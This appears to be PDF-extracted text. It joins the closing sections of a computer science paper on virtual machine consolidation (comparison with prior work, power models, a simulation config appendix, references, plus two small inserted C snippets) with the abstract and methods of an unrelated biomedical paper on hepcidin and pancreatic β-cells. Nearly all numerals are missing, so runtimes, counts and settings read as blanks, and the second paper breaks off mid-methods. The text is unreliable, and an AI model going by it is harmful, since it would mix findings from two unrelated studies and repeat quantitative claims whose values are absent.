https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of vms across seven equivalence sets from a representative large-scale experi- ment. vm equivalence set name concrete vm count micro , small , medium , large , xl dxl qxl in both experiments, we chose a distribution more heavily weighted towards the virtual machine sizes that the author has encountered during many years of professional and academic creation of vms for cloud computing. 
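as an aside on the configuration file mentioned above and reproduced in the appendix: it is flat key=value text with '#' comment lines, and a minimal reader for that form might look as follows. only two of the appendix keys are handled here and the function name is an assumption.

#include <stdio.h>
#include <string.h>

/* minimal reader for the key=value configuration format reproduced in the
   appendix: '#' lines are comments, everything else is "name=value"          */
static void load_config(FILE *fp, double *mem_overcommit, int *max_servers)
{
    char line[256];
    while (fgets(line, sizeof line, fp)) {
        char key[128];
        double val;
        if (line[0] == '#' || sscanf(line, "%127[^=]=%lf", key, &val) != 2)
            continue;                   /* skip comments, blanks and malformed lines */
        if (strcmp(key, "mem_overcommit_ratio") == 0)
            *mem_overcommit = val;      /* feeds tau[RAM] for every modeled host     */
        else if (strcmp(key, "max_simulated_servers") == 0)
            *max_servers = (int)val;
    }
}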
based on the author’s own practical experience in corporate vm creation and management for over a decade, it is apparent that many virtual machines begin their existence as a proof-of-concept system, generally sized as small as possible thus many are simply sized small at creation time. further, we chose this size skew because virtual machines that require high levels of resources such as ram or cpu are often selected for migration to dedicated hardware (often as the result of latency or performance reasons). likewise, we argue that virtual machine-based data center operators, do not tend to create data centers consisting only of massively over- configured hosts. thus, our experiments were targeted along a set of experiments fitting with our own empirical observations of cloud data centers. we should note however that our simulator does not stipulate any requirements on the number of vms simulate or the nominal host capacities represented, thus more extreme simulations can indeed be performed. an example of the configuration file used to perform the experiments can be seen in appendix. this configuration file format has proven to be expressive enough to run a variety of simulations during the course of this research. our approach is unique in that it is based on an algorithm with complexity and runtime growth governed by the number of hosts and vms, but substantially mitigated using an intermediate partial solution that is governed by the number of distinct group- ings of equivalent sized virtual machines (the classifications of virtual machine types) used in the system. while this algorithm may indeed break down for exceedingly large numbers of hosts (perhaps or , hosts), we maintain that our goals are for the autonomous management of small to medium sized data centers that we consider to be well in the operational range of our solution. we have not simulated data centers beyond the maximum configuration reported here. this is in part because there will always be some degree of reservation regarding our use of simulation software rather than real data center hardware, rendering further experimentation subject to those same criticisms. we submit that vm management research should not be the bastion of private industry researchers with privileged access to that exorbitantly expensive class of hardware and production virtual machines and did what we could with the resources dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. available to us. secondly, we limited the reach of our simulations because we have no empirical data sets for sizing the virtual machine distribution across a data center that size beyond those that we reported. unsurprisingly, various cloud virtual machine providers rejected a plurality of requests for that sort of information. not only has targeting this class of data center proved to be computationally tractable from a fully autonomous management perspective, but this class of data center are those that are much less likely to opt for exorbitant hardware capital expense needed to maintain performance while achieving consolidation (i.e., they want to consolidate to save money, and are generally less equipped with operational staff to manually check each migration operation if using live migration based consolidation. effectively, this class of user and data center are the users who need a lightweight, autonomous solution the most. 
formal comparisons to other vm-based cloud management systems are difficult in this type of research because this work was simulated while other published results may be run on other proprietary simulators or on real hardware. additionally, it is notable that systems that perform bin packing of vms do not generally open source or otherwise license their source code for no cost, and thus requiring black box reimplementation of described algorithms in order to perform meaningful comparisons. even under clean room implementation cases, one is never sure if the original authors used tweaks or modifications etc., which would render a clean room implementation comparison meaningless. with respect to published values of vm’s packed as a function of time taken to perform the packing, we present our results as compared to those of ferdaus et al. ( ) in their work using an ant colony optimization based on vector algebra. their experiments were performed on a smaller scale but roughly comparable server with respect to single core cpu speed. our approach is not threaded, and we were unable to determine from a careful reading of their paper if their solution was. their work is presented, similarly to our own, by using simulation. while they solve bin packing in a completely different approach to ours, they find their results favorable when compared to approaches like genetic algorithms. however, this improvement upon, or parity with their work can be considered a reasonable benchmark of success based on the literature. their results extrapolated from their fig. along with their surrounding text would at first glance appear much better than our own. we readily admit that our solution seemingly performs much worse for small-scale experiments as described in our table . as evidence of this, consider that our own packing solution for virtual machines took s in total while their comparable results reportedly took close to s to compute. their results are surely impressive for these small cases! however, it is our opinion that for these small cases of managed vms, either of our algorithms might be suitable for effectively continuous online application. however, their largest scale result includes only , virtual machines and took ‘‘around s on average.’’ in contrast, our largest simulation results involved , vms and completed in s. the only viable way to compare our results is to extrap- olate by optimistically assuming their results scale linearly in the number of vms (which ferdaus et al. explicitly admit is not the case stating ‘‘it is observed that computation time increases non-linearly with the number of vms with small gradient’’). using this dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. optimistic extrapolation, we paint their work in the best possible light and attempt to perform a meaningful comparison to our own work. if we assume their results suggest a management rate of vms/sec (derived from their published values reporting , vms managed in s) their algorithm on a , vm problem set would yield around s run time that would hypothetically, but optimistically, exceed our own by % (or s). while these numbers do not provide conclusive superiority of one technique over the other, they do seem comparable. 
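stated symbolically, the optimistic linear extrapolation used in this comparison amounts to assuming a constant management rate derived from the reported measurement and scaling it to the target problem size (the concrete figures are those quoted earlier in this section):

\[
r = \frac{n_{\mathrm{reported}}}{t_{\mathrm{reported}}}, \qquad \hat{t}(n) = \frac{n}{r} = t_{\mathrm{reported}} \cdot \frac{n}{n_{\mathrm{reported}}}
\]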
their analysis includes remarks that their results perform better than ffd based approaches, and a sizeable portion of our concrete assignment computation is based on a type of ffd derived technique which may explain much of their performance benefit especially in the scenarios with a small number of managed vms. in addition, we submit that their solution only considers, ‘‘cpu, memory, and network i/o as relevant server resources in the context of vm consolidation’’ while ours considers cpu, memory, aggregate network i/o as well as cumulative network read i/o and cumulative network write i/o as well as network read/write/aggregate i/o. in addition we support preferential colocation and anti-colocation constraints that their solution does not handle at present. in summation of this section, our work performs comparably when extrapolating to the results of ferdaus et al. ( ) in as favorable a means as possible while our reported results handled more resource dimensions, and included arguably necessary resources like colocation and anti-colocation for viable pro- duction systems. lastly our work may be seen as preferable for production deployment based on the deterministic nature of our solution while the approach taken by ferdaus et al. is probabilistic. we conclude our comparative analysis to other known works in the field by comparing our work to a recent paper from hwang & pedram ( ). while they also take a hierar- chical approach to virtual machine consolidation, using simulation for their published results, we note the following differences between our respective works. first, hwang and pedram decompose the problem in a slightly different way, opting for decomposition with a global manager that places vms into clusters or functional groups, along with a local manager that assigns vms to hosts within a given cluster. our highest-level hierarchy is grouping vms not based on cluster functionality but rather on their instance type or equivalence set. the second major difference of note is that their approach is heuristic in nature and appears to be based on a modified ffd algorithm that considers an aggregate of the free resources available as the term for greedy selection. our work is hierarchical in that once a generic instance-type allocation has been prescribed, the concrete assignment phase hierarchically uses a type of ffd that descends through an a priori ordered list of resource dimensions and colocation/anti-colocation criteria to be used as tie-breakers for greedy selection. thus, the ffd greedy selection criterion hierarchy is only used as needed. their work seemingly does not consider colocation or anti-colocation considerations. comparing to their results, we can rely on the single published reference of concrete runtimes, fig. in their work. note the remaining figures they have included are presented as normalized runtimes for comparative purposes. through email correspondence, the author of this work has confirmed the label in their fig. is incorrectly identified with a label of ‘‘seconds,’’ when it should in fact be labeled dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘microseconds’’. referring concretely to their fig. , the best-case run time for packing management of , vms is∼ . ∗ microseconds ( s) using a window size of . their worst case published run time with a window size for the management of , vms is s ( . min). 
as you will recall from earlier in this section, our solution for a vm packing problem that was four times as large ( , vms) took under two minutes. once more we extrapolate using an optimistic linear extrapolation to a problem size of × and we estimate optimistically that pedram and hwang's solution for a comparable problem size would take s in the best case. it is evident that a linear extrapolation is generous for comparative purposes, as their results show a decidedly non-linear runtime increase covering the , , , , , and , vm cases varied across each of their sliding window size selections. in their worst-case results (sliding window size of ), using the same optimistic × extrapolation, we optimistically conclude that an estimated lower-bound runtime would be approximately s (which is, coincidentally, our empirically measured value for the , vm problem set). we conclude that our algorithm performs slower than pedram and hwang's best-case published solution when extrapolated optimistically for the ∼ , vm problem size, but performs comparably to their worst-case solution when extrapolating, even though our solution considers colocation constraints that theirs does not. accounting for generous extrapolations, we expect our solution would perform comparably, if not better, in practice for larger problem sizes while accounting for colocation and anti-colocation that their solution seemingly does not handle.

conclusions and next steps

our results show that decomposing the problem of virtual machine consolidation in cloud computing data centers into an abstract solution phase and a concrete fulfillment stage is advantageous: it is easy to implement, allows satisfaction of multiple resource constraints, provides an easy means for implementing oversubscription support, and enables a straightforward approach to colocation and anti-colocation requirements with very reasonable runtimes (under s) for moderate numbers of virtual machines ( , vms). in this way we can make use of observation data, if available, during the second phase of concrete assignment to improve placement decisions. these results compare favorably to the published literature from ferdaus et al. as well as the work of hwang and pedram. however, we tender these comparisons loosely, given the different motivations of the work, the different problem set sizes used in the various publications, and the requisite need to extrapolate in our effort for meaningful comparison. further, it is apparent that our ongoing work should investigate potential sorting optimizations to ameliorate the sorting activity that dominated our runtime profile. while the work of roytman et al. ( ) demonstrated one means for performance characterization of potential consolidation impacts by using a staging area for new virtual machines, our research group believes that online detection of poor placement or colocation decisions should be a separate process architecturally. furthermore, we believe the process of vm placement will eventually move to a fully dynamic and continuous system that operates at the data center scale. live-guest migration and fast networking technologies are beginning to show the promise of extremely short and non-disruptive live-migrations for even large-scale enterprise sized virtual machines.
we are therefore working on an on-line, machine-learning-based (dow, ) system to perform the task of detecting poor colocation decisions as a remedial effort for continuous cloud-scale vm rebalancing. we believe this work will complement the rapid consolidation planning implementation we have outlined here. it is our assertion that evidence-based vm continuous placement adjustment decisions will become the nominal operational reality for iaas virtual machine clouds. the desire to pack vms expediently stems from implications regarding server power consumption in heterogeneous compute clouds. fan, weber & barroso ( ) describe the covariant relationship between cpu usage and server power consumption as a linear relationship between the power consumption of the server and the increase in cpu utilization. the range of this covariance extends from virtually idle through fully utilized states.

p(u) = p_idle + (p_busy − p_idle) · u

this equation gives a linear model of power estimation based on cpu utilization and idle power consumption: p is the estimated power consumption, p_idle is the power consumption of an idle server, and p_busy is the power consumption of a fully utilized server. the value u is the instantaneous present cpu utilization of the host. their work demonstrates that using this simple linear model, one can estimate the future power consumption of a server with error below %. the empirical, nonlinear model they further proposed is:

p(u) = p_idle + (p_busy − p_idle) · (2u − u^r)

this improved empirical model of power estimation is based on calibration experimentation: the parameter r is an experimentally obtained calibration parameter that minimizes the squared error for the given class of host hardware. to use this formula, each class of host hardware must undergo a set of calibration experiments to generate the value of r that tunes the model. their work, which spans thousands of nodes under different types of workloads, demonstrates a prediction error below % for a tuned empirical model. using the results from fan et al., it may be possible to treat hosts as equivalent resources in the same fashion as virtual machines are considered equivalent in this work. it is interesting to note that the previously mentioned work of ferdaus et al. also uses the same general formulation for modeling power consumption in their fig. as shown above. this lends some degree of consensus to the adoption of this relatively straightforward approach for modeling power consumption of virtual machines. the approach envisioned makes the assumption that one could use the ''smallest'' hardware resource capacity vector from a set of hosts that have been arbitrarily clustered (perhaps through k-means or similar clustering approaches) by their power consumption estimation formulas (the two equations above). this work seems a logical follow-on and a reasonable next step to investigate.
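as a sketch, the two estimators above transcribe directly into c for use with per-hardware-class calibration values; the function and parameter names are illustrative assumptions.

#include <math.h>

/* linear and calibrated empirical power estimates following fan, weber &
   barroso: u is the instantaneous cpu utilization in [0, 1] and r is the
   per-hardware-class calibration exponent obtained experimentally            */
static double power_linear(double p_idle, double p_busy, double u)
{
    return p_idle + (p_busy - p_idle) * u;
}

static double power_empirical(double p_idle, double p_busy, double u, double r)
{
    return p_idle + (p_busy - p_idle) * (2.0 * u - pow(u, r));
}

a host equivalence class could then carry its own p_idle, p_busy and r alongside its capacity vector.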
appendix: simulation configuration file hardware # the total number of physical host servers to be modeled max_simulated_servers= #the largest server ram allocation present in the cloud (largest server ram in mb) max_server_ram_size= #the largest smallest ram allocation present in the cloud (smallest server ram in mb) min_server_ram_size= # the largest server cpu allocation present in the cloud (number of hardware cores) max_server_cpu_size= #the largest smallest ram allocation present in the cloud (smallest server ram in mb) min_server_cpu_size= # the largest server net allocation present in the cloud (in gb/sec) max_server_net_size= # the largest server net rx allocation present in the cloud (in gb/sec) max_server_net_rx_size= # the largest server net tx allocation present in the cloud (in gb/sec) max_server_net_tx_size= # the largest server io allocation present in the cloud (in gb/sec) max_server_io_size= # the largest server io read allocation present in the cloud (in gb/sec) max_server_io_read_size= # the largest server io write allocation present in the cloud (in gb/sec) max_server_io_write_size= overcommit # overcommit is the oversubscription or overallocation of resources to virtual machines # with respect to the physical hosts maximum allocation of a particular resource. # dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. # as an example, setting memory overcommit to means a : ratio of allowed cumulative # vm memory consumption to the hosts physical ram. # # setting a cpu overcommit value of indicates scheduling up to virtual cpu cores # per single physical cpu core on the host. # # note: values should always be or greater... mem_overcommit_ratio= cpu_overcommit_ratio= net_overcommit_ratio= net_rx_overcommit_ratio= net_tx_overcommit_ratio= io_overcommit_ratio= io_read_overcommit_ratio= io_write_overcommit_ratio= virtual machines # the number of micro sized virtual machines micro= # the number of small sized virtual machines small= # the number of medium sized virtual machines medium= # the number of large sized virtual machines large= # the number of extra large sized virtual machines xl= # the number of double extra large sized virtual machines dxl= # the number of quadruple extra large sized virtual machines qxl= migration plans # the maximum possible inbound migrations per host (for bandwidth limiting or cpu concerns with parallel migrations) dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. max_concurrent_inbound_migrations_per_host= # the maximum possible outbound migrations per host # (for bandwidth limiting or cpu concerns with parallel migrations) max_concurrent_outbound_migrations_per_host= # the maximum possible cumulative inbound and outbound migrations per host # (for situations where the above alone will not tell the whole story of hypervisor impact) max_concurrent_overall_migrations_per_host= additional information and declarations funding the author received no funding for this work. competing interests eli m. dow is an employee of ibm research. author contributions • eli m. dow conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. 
data availability the following information was supplied regarding data availability: research performed in support of this publication did not generate appreciable or generally useful raw data beyond the comparative summary statistics reported herein. references campegiani p. . a genetic algorithm to solve the virtual machines resources allo- cation problem in multi-tier distributed systems. in: second international workshop on virtualization performance: analysis, characterization, and tools (vpact ). available at http://www.paolocampegiani.it/vpact.pdf . campegiani p, lo presti f. . a general model for virtual machines resources allocation in multi-tier distributed systems. in: autonomic and autonomous systems, . icas’ . piscataway: ieee, – . dow em. . inciting cloud virtual machine reallocation with supervised machine learning and time series forecasts. in: proceedings of the enterprise compute conference (ecc). available at https://ecc.marist.edu/conf /pres/dowincite-presentation- ecc .pdf . dow em, matthews n. . virtual machine migration plan generation through a∗ search. in: cloud networking (cloudnet), ieee th international conference on cloud networking. piscataway: ieee, – . dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.paolocampegiani.it/vpact.pdf https://ecc.marist.edu/conf /pres/dowincite-presentation-ecc .pdf https://ecc.marist.edu/conf /pres/dowincite-presentation-ecc .pdf http://dx.doi.org/ . /peerj-cs. fan x, weber w, barroso la. . power provisioning for a warehouse-sized com- puter. in: proceedings of the th annual international symposium on computer architecture. new york: acm, – . ferdaus mh, murshed m, calheiros rn, buyya r. . virtual machine consolidation in cloud data centers using aco metaheuristic. in: euro-par parallel processing. new york: springer, – . gandhi a, harchol-balter m, das r, lefurgy c. . optimal power allocation in server farms. in: proceedings of acm sigmetrics. available at http://www .cs. stonybrook.edu/~anshul/sigmetrics_ _tech.pdf . greenberg a, hamilton j, maltz da, patel p. . the cost of a cloud: research problems in data center networks. acm sigcomm computer communication review ( ): – doi . / . . gu j, hu j, zhao t, sun g. . a new resource scheduling strategy based on genetic algorithm in cloud computing environment. journal of computers ( ): – doi . /jcp. . . - . hwang i, pedram m. . hierarchical virtual machine consolidation in a cloud computing system. in: proceedings of the ieee sixth international conference on cloud computing (cloud’ ). piscataway: ieee computer society, – . isci c, liu j, abali b, kephart jo, kouloheris j. . improving server utilization using fast virtual machine migration. ibm journal of research and development ( ): – . jiang y, shen x, chen j, tripathi t. . analysis and approximation of optimal co- scheduling on chip multiprocessors. in: proceedings of the seventeenth international conference on parallel architectures and compilation techniques, – . jiang y, tian k, shen x. . combining locality analysis with online proactive job co- scheduling in chip multiprocessors. in: proceedings of the international conference on high-performance embedded architectures and compilers, – . johnson ds, demers a, ullman jd, garey mr, graham rl. . worst-case perfor- mance bounds for simple one-dimensional packing algorithms. siam journal on computing ( ): – doi . / . kohavi r, henne rm, sommerfield d. . practical guide to controlled experiments on the web: listen to your customers not to the hippo. 
in: proceedings of the thirteenth annual acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . lynar tm, herbert rd, simon s. . auction resource allocation mechanisms in grids of heterogeneous computers. wseas transactions on computers ( ): – . mars j, tang l, hundt r, skadron k, soffa ml. . bubble-up: increasing utilization in modern warehouse scale computers via sensible co-locations. in: proceedings of the forty-fourth annual ieee/acm international symposium on microarchitecture (micro ). new york: acm. narayanan d, donnelly a, rowstron a. . write offloading: practical power management for enterprise storage. in: proceedings of the file and storage technologies conference, san jose, ca, – . dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www .cs.stonybrook.edu/~anshul/sigmetrics_ _tech.pdf http://www .cs.stonybrook.edu/~anshul/sigmetrics_ _tech.pdf http://dx.doi.org/ . / . http://dx.doi.org/ . /jcp. . . - http://dx.doi.org/ . /jcp. . . - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. panigrahy r, talwar k, uyeda l, wieder u. . heuristics for vector binpacking. microsoft research technical report. redmond, microsoft. available at http: //research.microsoft.com/apps/pubs/default.aspx?id= . roytman a, kansal a, govindan s, liu j, nath s. . pacman: performance aware virtual machine consolidation. in: proceedings of the th international conference on autonomic computing (icac), – . available at https://www.usenix.org/conference/ icac /technical-sessions/presentation/roytman. schurman e, brutlag j. . performance related changes and their user impact. in: o’reilly: web performance and operations conference (velocity). tian k, jiang y, shen x. . a study on optimally co-scheduling jobs of different lengths on chip multiprocessors. in: proceedings of the acm international conference on computing frontiers. new york: acm. tulloch m. . achieve higher consolidation ratios using dynamic memory. biztech article. available at http://www.biztechmagazine.com/article/ / /achieve-higher- consolidation-ratios-using-dynamic-memory. united states environmental protection agency. . report to congress on server and data center energy efficiency public law - . technical report, epa energy star program. washington, d.c., epa. vmware, inc. . the role of memory in vmware esx server . palo alto: vmware, introduction section, paragraph , page . available at https://www.vmware.com/pdf/ esx _memory.pdf . zhang d, ehsan m, ferdman m, sion r. . dimmer: a case for turning off dimms in clouds. in: acm symposium on cloud computing (socc). new york: acm. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://research.microsoft.com/apps/pubs/default.aspx?id= http://research.microsoft.com/apps/pubs/default.aspx?id= https://www.usenix.org/conference/icac /technical-sessions/presentation/roytman https://www.usenix.org/conference/icac /technical-sessions/presentation/roytman http://www.biztechmagazine.com/article/ / /achieve-higher-consolidation-ratios-using-dynamic-memory http://www.biztechmagazine.com/article/ / /achieve-higher-consolidation-ratios-using-dynamic-memory https://www.vmware.com/pdf/esx _memory.pdf https://www.vmware.com/pdf/esx _memory.pdf http://dx.doi.org/ . /peerj-cs. : – t shu, z lv et al. 
low hepcidin impaired mitochondria function research hepcidin as a key iron regulator mediates glucotoxicity-induced pancreatic β-cell dysfunction tingting shu ,*, zhigang lv ,*, yuchun xie , junming tang and xuhua mao department of central laboratory, jiangsu province official hospital, nanjing, jiangsu, china department of clinical laboratory, yixing people hospital, affiliated jiangsu university, yixing, wuxi, jiangsu, china correspondence should be addressed to x mao: flora @hotmail.com *(t shu and z lv contributed equally to this article) abstract it has been well established that glucotoxicity induces pancreatic β-cells dysfunction; however, the precise mechanism remains unclear. our previous studies demonstrated that high glucose concentrations are associated with decreased hepcidin expression, which inhibits insulin synthesis. in this study, we focused on the role of low hepcidin level-induced increased iron deposition in β-cells and the relationship between abnormal iron metabolism and β-cell dysfunction. decreased hepcidin expression increased iron absorption by upregulating transferrin receptor (tfr ) and divalent metal transporter (dmt ) expression, resulting in iron accumulation within cells. prussia blue stain and calcein-am assays revealed greater iron accumulation in the cytoplasm of pancreatic tissue isolated from db/db mice, cultured islets and min cells in response to high glucose stimulation. increased cytosolic iron deposition was associated with greater fe + influx into the mitochondria, which depolarized the mitochondria membrane potential, inhibited atp synthesis, generated excessive ros and induced oxidative stress. the toxic effect of excessive iron on mitochondrial function eventually resulted in impaired insulin secretion. the restricted iron content in db/db mice via reduced iron intake or accelerated iron clearance improved blood glucose levels with decreased fasting blood glucose (fbg), fasting blood insulin (fins), hba c level, as well as improved intraperitoneal glucose tolerance test (ipgtt) results. thus, our study may reveal the mechanism involved in the role of hepcidin in the glucotoxcity impaired pancreatic β cell function pathway. introduction hepcidin is synthesized and secreted primarily in the liver and is a key regulator in iron metabolism ( , ). in , kulaksiz et  al. first reported that hepcidin was expressed in human and rat islet tissues and only existed in insulin-secreting β-cells ( ), and then other studies showed low concentration of glucose could stimulate hepcidin secretion in pancreatic beta cell line ( , ). subsequently, the correlation between hepcidin and type diabetes (t dm) has gained increased attention. in addition, several reviews have indicated that hepcidin is an independent risk factor for the onset of t dm ( , , ). indeed, the serum hepcidin levels in t dm patients has been found to be significantly lower than those in healthy individuals ( , , ). however, the mechanism by which hepcidin mediates t dm pathogenesis remains unclear. recent reports attribute the probable mechanism to the induction of peripheral tissue insulin resistance ( ) through inflammatory response, oxidative stress ( ) and - - key words f t dm f hepcidin f iron overload f pancreatic dysfunction endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution . international license.https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:flora @hotmail.com http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : mitochondrial dysfunction pathways ( ), which affect glucose metabolism in peripheral tissues ( ). to date, there have been few reports describing the role of hepcidin in pancreatic β-cells. our previous results confirmed that the level of hepcidin was decreased under conditions of high glucose stimulation and had a disrupted effect on insulin secretion ( ). in addition, the iron status induced by decreased hepcidin expression and its possible toxic effect on β-cell function must be further evaluated and explored. the lower level of hepcidin could cause iron overload by preventing iron exportation or increase iron intake ( , ). the deposition of iron in the cytosol is pumped into mitochondria via the ion transporter mitochondrial substrate carrier family protein (mcfu) ( , ). as a divalent positively charged ion, fe + depolarizes the mitochondria membrane potential, resulting in a disruption of the electron transport chain (etc), ( ) which influences the energy supply required for insulin secretion ( ). moreover, mitochondrial function becomes impaired, which induces endoplasmic reticulum stress response (er stress), leading to β-cell apoptosis ( , ). in the situation described earlier, we believe that the iron overload in β-cells induced by low hepcidin levels plays an important role in the process of glucotoxicity-mediated depression of β-cell function. in this study, we aimed to clarify the iron overload status in the cytosol and mitochondria using the min cell line, pancreatic islets and db/db mice, as well as discuss the probable mechanism by which iron toxicity influences mitochondrial function. to this end, we used db/db mice to study the effect of restricting iron content on blood glucose levels by decreasing iron intake or accelerating iron clearance. materials and methods cell culture the mouse pancreatic β-cell line, min (passage – was kindly providing by department of islet β-cell function laboratory, jiangsu province official hospital), was cultured in dulbecco’s modified eagles medium (invitrogen) containing mm glucose and supplemented with % fetal bovine serum (invitrogen). the media was supplemented with μg/ml streptomycin, u/ml penicillin and μmol/l β-mercaptoethanol. the cells were maintained at °c in a humidified incubator under % co / % air. virus construction and gene infected the mouse hepcidin-expressing plasmid was constructed by inserting the full-length coding region of hepcidin (id: ) into pcdna . vector, and then cut from pcdna . ligated into ad-track vector (ad-hepcidin) and sequenced to confirm. for gene transfer, adenovirus generation, amplification and titration were performed. viral particles were purified using the adenovirus purification kit (cell biolabs, san diego, ca, usa). min cells were infected with adenovirus at a multiplicity of infection of at °c and, h after infection, the cells were cultured in fresh medium for another h before treating with glucose (sigma-aldrich) treatment. use ad-gfp virus as control. 
pancreatic islet isolation all animal studies were performed according to guidelines established by the research animal care committee of nanjing medical university. animals used for islet isolation ( -week-old c bl/ mice) were purchased from the national resource center. islets were isolated and cultured as previously described ( ). insulin immunofluorescence was performed to identify the islet cells (supplementary fig.  , see section on supplementary data given at the end of this article). gsis assay the gsis assay was performed as previously described ( ) – isolated mouse islets and min cells were transferred into -well plates ( islets/well; cells/well) and treated with different concentrations of glucose. insulin content was assessed using a commercial elisa kit (alpco diagnostics) ( ) in accordance with the manufacturer’s instructions. hepcidin and ferritin content analysis the hepcidin content of both the islets and culture supernatants was determined using a commercial elisa kit purchased from drg instruments (gmbh, marburg, germany) according to the manufacturer’s protocol. the db/db mice and their littermate control mice’ blood ferritin levels were measured using a commercial elisa kit purchased from monobind (lake forest, ca, usa) according to the manufacturer’s instructions. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : rna extraction, reverse transcription and qrt-pcr total rna was extracted using trizol reagent (invitrogen) according to the manufacturer’s protocol. reverse transcription was performed using one- step rt-pcr system (invitrogen). sybr green real- time pcr master mix (invitrogen) and light cycler ii sequence detection system (roche) were used for qrt-pcr, and mrna levels were normalized to β-actin. the sequences of the primers used for qrt-pcr are listed in supplementary table  . western blotting cells were immediately washed with ice-cold phosphate buffered saline (pbs) and lysed with lysis buffer containing mm tris–hcl (ph . ), mm nacl, . % sodium azide, . % sds, μg/ml aprotinin, % np- , % deoxycholic acid sodium salt and μg/ml pmsf. cell debris was removed by centrifugation ( , g at °c for min). the protein concentration was determined using a dc protein assay kit (bio-rad), and the protein samples were separated by sds-page, transferred to immune-blot pvdf membranes (bio-rad) and incubated at °c overnight with rabbit anti-dmt (divalent metal transporter ); rabbit anti-tfr (transferrin receptor ) (santa cruz). the membranes were then incubated at room temperature with rabbit anti-β-action antibodies (santa cruz) for h and analyzed using the ecl (enhanced chemiluminescence) purchased from sigma-aldrich. fluorescence in situ hybridization (fish) pancreatic tissues isolated from control and db/db mice were fixed in mg/ml in paraformaldehyde and frozen in oct compound (sakura, coronado, ca, usa). for fish, the probe mixture was dissolved in hybridization buffer ( % dextran sulfate, mm vanadyl-ribonucleoside complex, . % bsa, × ssc, and % formamide) and added to the tissue sections for an overnight incubation at °c. 
the probe sequences are listed in supplementary table  . after incubating with the secondary antibodies, images were obtained and analyzed using ix fluorescence microscope (olympus). cytosolic chelatable iron assay to visualize cytosol iron mobilization of min cells, the cells were grown in -well plates and co-loaded with diluted calcein-am purchased from life technologies. the total volume of the culture medium per well for a -well plate was µl, which included µl of the initial culture medium, µl of the test compound and µl calcein-am; all the wells contained . % dmso. both fluorescent and phase-contrast images were taken using a fluorescence microscope (olympus) at the indicated time intervals. compounds that autofluoresced were excluded. quenching of calcein-am fluorescence signifies an increase in cytosolic chelatable fe +. prussian blue staining pancreatic tissues and isolated islet cells from control and db/db mice were stained with perls’ reagent (sigma) to identify the presence of iron particles. the sections and cells were incubated with perl’s reagent with : mixture of % potassium ferrocyanide and % hydrochloric acid for min at room temperature. the slides were counterstained using nuclear fast red. prussian blue- positive cells were examined using an olympus light microscope and photographed. ros determination intracellular ros were measured by flow cytometry using , -dichlorofluorescein diacetate (dcfh-da) (bd, franklin lakes, nj, usa) as a probe. after treating the cells with different concentrations of glucose, the cells were washed twice with pbs and co-incubated with serum- free rpmi containing μm dcfh-da for min at °c in the dark and washed twice with pbs. ros were measured using canton ii flow cytometer (bd), at nm excitation and nm emission. the data were recorded using diva software (bd). determination of mitochondrial membrane potential (Δψm) we followed the methods of qiao  et  al. ( ). the Δψm in min cells was measured using a mitoscreen (jc- ) kit (bd). the cells were harvested and incubated with jc- at °c for − min, after which the staining solution was removed, washed and re-suspended in pbs. the samples were then analyzed with a canton ii flow cytometer (bd). the loss of Δψm was reflected by increased green fluorescence from the jc- monomers, as well as a loss of red fluorescence from the jc- aggregates. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : determination of adenosine ′-triphosphate (atp) release atp release from the cultured cell lines was measured using a commercially available rluciferase/luciferin (rl/l) reagent assay (promega enliten). briefly, the samples were neutralized to ph . with μl m tris and were aliquoted to a new tube with μl atp-free water. luciferase reagent was added s before measurement in the / n luminometer turner biosystems (sunnyvale, ca, usa). an atp standard curve was constructed, and all samples were measured in duplicate. to ensure a low background, a ‘blank’ containing only rl/l reagent and hbss was analyzed. atp concentrations were determined by comparison to a standard curve. 
